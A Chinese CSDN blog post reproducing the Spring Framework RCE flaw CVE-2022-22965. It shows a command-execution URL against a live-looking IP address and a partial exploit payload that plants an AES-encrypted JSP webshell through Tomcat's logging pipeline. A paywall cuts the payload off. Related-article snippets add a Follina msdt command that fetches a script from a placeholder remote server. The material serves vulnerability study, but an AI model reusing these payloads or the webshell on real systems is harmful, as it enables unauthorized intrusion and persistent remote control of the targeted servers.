CVE-2022-22965:Spring远程代码执行漏洞复现

最新推荐文章于 2023-07-25 12:43:29 发布
最新推荐文章于 2023-07-25 12:43:29 发布
阅读量440 收藏
点赞数
分类专栏: 内网渗透 文章标签: spring java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xjh8023/article/details/126463029
版权
CVE-2022-22965:Spring远程代码执行漏洞复现&getshell骚操作
摘要由CSDN通过智能技术生成

CVE-2022-22965
在这里插入图片描述利用一键化工具可以检测到该漏洞可以RCE
在这里插入图片描述

http://82.157.246.36:49158/tomcatwar.jsp?pwd=j&cmd=whoami

在这里插入图片描述发现可以执行,但是利用此种方法是无法获取到webshell或是直接上线的。换一种方法打
在这里插入图片描述
poc:

class.module.classLoader.resources.context.parent.pipeline.first.pattern=<%25{
   sign}i!+String+xc%3d"3c6e0b8a9c15224a"%3b+String+pass%3d"pass"%3b+String+md5%3dmd5(pass%2bxc)%3b+class+X+extends+ClassLoader{
   public+X(ClassLoader+z){
   super(z)%3b}public+Class+Q(byte[]+cb){
   return+super.defineClass(cb,+0,+cb.length)%3b}+}public+byte[]+x(byte[]+s,boolean+m){
   +try{
   javax.crypto.Cipher+c%3djavax.crypto.Cipher.getInstance("AES")%3bc.init(m%3f1%3a2,new+javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"))%3breturn+c.doFinal(s)%3b+}catch+(Exception+e){
   return+null%3b+}}+public+static+String+md5(String+s)+{
   String+ret+%3d+null%3btry+{
最低0.47元/天 解锁文章
NilnG
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-22965分析复现
include_voidmain的博客
04-12 3510
0x01 前置知识 Introspector类 javabean通常是用来做数据封装的java类,为了方便数据的读取与写入,会有getter/setter方法来对数据进行操作,在jdk中有一个Introspector类,通过该类的方法可以获取javabean的相关信息,包括javabean中的属性值,以及属性值对应的getter/setter方法。 对于属性的获取,其实是通过对应的getter/setter方法来确定的,如果存在对应的getter/setter方法或其中的一个,都会认为存在对应的属性,下面通
CVE-2022-4510:Binwalk 远程代码执行漏洞
07-03
本文将深入探讨一个与二进制分析工具相关的安全事件,即"CVE-2022-4510:Binwalk 远程代码执行漏洞"。Binwalk是一款广泛使用的开源工具,主要用于固件分析、逆向工程和提取嵌入式系统的固件图像。这个漏洞可能导致...
Spring RCE 漏洞 CVE-2022-22965复现分析
m0_61506558的博客
09-19 5471
关于CVE-2022-22965漏洞的环境调试和内容,网上看了一波,感觉有些知识点内容还是必须要了解才能理解该漏洞,为此详细写了下从Spring框架结构分析,环境搭建到漏洞分析调试整体的一个过程理解,在遇到其他类型的漏洞也可以去调试运用。(一)了解Spring框架由于本文主要介绍漏洞原理流程,所以有关框架不会具体展开,会将涉及到的内容进行解释。1、
CVE-2022-22965Spring远程代码执行漏洞
热门推荐
一只爱吃橙子的羊
04-09 3万+
CVE-2022-22965Spring Framework远程代码执行漏洞
深度解析CVE-2022-22965 Spring 远程命令执行漏洞
qq_29616295的博客
07-25 403
jdk9+ Spring 及其衍生框架 使用tomcat部署spring项目 使用了POJO参数绑定 Spring Framework 5.3.X < 5.3.18 SpringBoot请参照lib中的具体springframework版本 二 漏洞原理 2.1 spring嵌套类型绑定机制 在spring框架中,支持对传入参数的嵌套绑定,例如现在有两个实体类Bean: 相关Controller层代码如下: 运行项目,访问http://localhost:8080/unnamed
Spring Framework 远程代码执行漏洞复现CVE-2022-22965
Start C的博客
04-01 4755
1、概述 Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包,是一个包含Spring框架基本的核心工具包,Spring其他组件都要使用到这个包。 未经身份验证的攻击者可以使用此漏洞进行远程任意代码执行。 该漏洞广泛存在于Spring 框架以及衍生的框架中,并JDK 9.0及以上版本会受到影响。 2、受影响版本 Spring Core <= 5.2.19, <= 5.3.17 Spring Boot <= 2.6.5 3、利用前提 JD
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
最新发布
10-27
2022年,Spring Framework 发现了一个严重的远程命令执行(RCE)漏洞,被称为CVE-2022-22965,也被称为“Spring4Shell”。这个漏洞对使用Spring Framework的应用程序构成了重大威胁,因为攻击者可以利用它来执行...
CVE-2022-22965 GUItools单个图形化利用工具
04-06
3月31日,spring 官方通报了 Spring 相关框架存在远程代码执行漏洞,并在 5.3.18 和 5.2.20.RELEASE 中修复了该漏洞漏洞评级:严重 影响组件:org.springframework:spring-beans 影响版本:和 的Spring框架均...
(CVE-2022-22965)Spring Framework 远程命令执行漏洞(vulfocus复现)
qq_40646572的博客
05-11 830
漏洞SpringFramework数据绑定的一个漏洞,如果后台方法中接受的参数为非基础类型,Spring会根据前端传入的请求正文中的参数的key值来查询与其名称所对应的getter和setter方法,攻击者利用这一特性修改了Tomcat的一个用于日志记录的类的属性,进而当Tomcat在进行写日志操作的时候,将攻击者传递的恶意代码写入指定目录的指定文件中。
用OSINT探测Citrix漏洞:CVE-2022-27510,CVE-2022-27518
rxb0513的博客
01-30 490
登录OSITN搜索引擎criminalip.io ,在Element Analysis上用以下关键词进行搜索,就可以确认外部开放的Citrix服务器统计。这是一篇博客文章,介绍如何用OSINT搜索引擎搜索CVE-2022-27518, CVE-2022-27518。而且这个博客还涉及确认脆弱的Citrix版本的方法和搜索方法,我们可以参考参考。
Spring远程命令执行漏洞CVE-2022-22965)原理分析和思考
jidunkeji的博客
04-06 4536
前言 上周网上爆出Spring框架存在RCE漏洞,野外流传了一小段时间后,Spring官方在3月31日正式发布了漏洞信息,漏洞编号为CVE-2022-22965。本文章对该漏洞进行了复现和分析,希望能够帮助到有相关有需要的人员进一步研究。 1►前置知识 1.1 SpringMVC参数绑定 为了方便编程,SpringMVC支持将HTTP请求中的的请求参数或者请求体内容,根据Controller方法的参数,自动完成类型转换和赋值。之后,Controller方法就可以直接使用这些参数,避免了需要编写大
[CVE-2022-22965]Spring远程代码执行漏洞复现
sGanYu
04-26 4518
漏洞概述(级别:高危) 续上一次Log4j2后,于2022年03月29日,Spring官方发布了Spring框架远程命令执行漏洞公告(CNVD-2022-23942、CVE-2022-22965) 攻击者可以通过构造恶意请求来利用这些漏洞,从而造成任意代码执行,未经身份验证的攻击者可以使用此漏洞进行远程任意代码执行,该漏洞广泛存在于Spring框架以及衍生的框架中,JDK 9.0及以上版本会受到此漏洞影响 FOFA语法 app="APACHE-Tomcat" || app="vmware-Sprin
记录一次vulhub:Spring Framework远程代码执行漏洞复现CVE-2022-22965
sszsNo1的博客
06-29 196
vulhub:Spring Framework远程代码执行漏洞复现CVE-2022-22965
CVE-2022-23222 漏洞复现
qq_43472789的博客
06-09 632
2022年1月14日,一个编号为CVE-2022-23222的漏洞被公开,这是一个位于eBPF验证器中的漏洞漏洞允许eBPF程序在未经验证的情况下对特定指针进行运算,通过精心构造的代码,可以实现任意内核内存读写,而这将会造成本地提权的风险。由于内核在执行用户提供的 eBPF 程序前缺乏适当的验证,攻击者可以利用这个漏洞获取 root 权限。该漏洞是由于 Linux 内核的 eBPF 验证器存在一个空指针漏洞,没有对*_OR_NULL指针类型进行限制,允许这些类型进行指针运算。
春秋云镜 CVE-2022-25411
qq_22002773的博客
07-04 460
春秋云镜 CVE-2022-25578
Goby漏洞更新 | PbootCMS 3.1.2 远程代码执行漏洞CVE-2022-32417)
m0_46699477的博客
04-01 5537
PbootCMS是PbootCMS个人开发者的一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。PbootCMS 3.1.2版本中存在安全漏洞,攻击者可通过该漏洞引发代码远程执行
Goby漏洞更新|WordPress Metform 插件 forms 文件信息泄露漏洞CVE-2022-1442)
m0_46699477的博客
04-12 278
WordPress plugin Metform 是WordPress的一款安全联系表单插件。WordPress plugin Metform存在安全漏洞,该漏洞源于~/core/forms/action.php文件存在访问控制不当,攻击者可获取用户的各种秘钥信息。
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值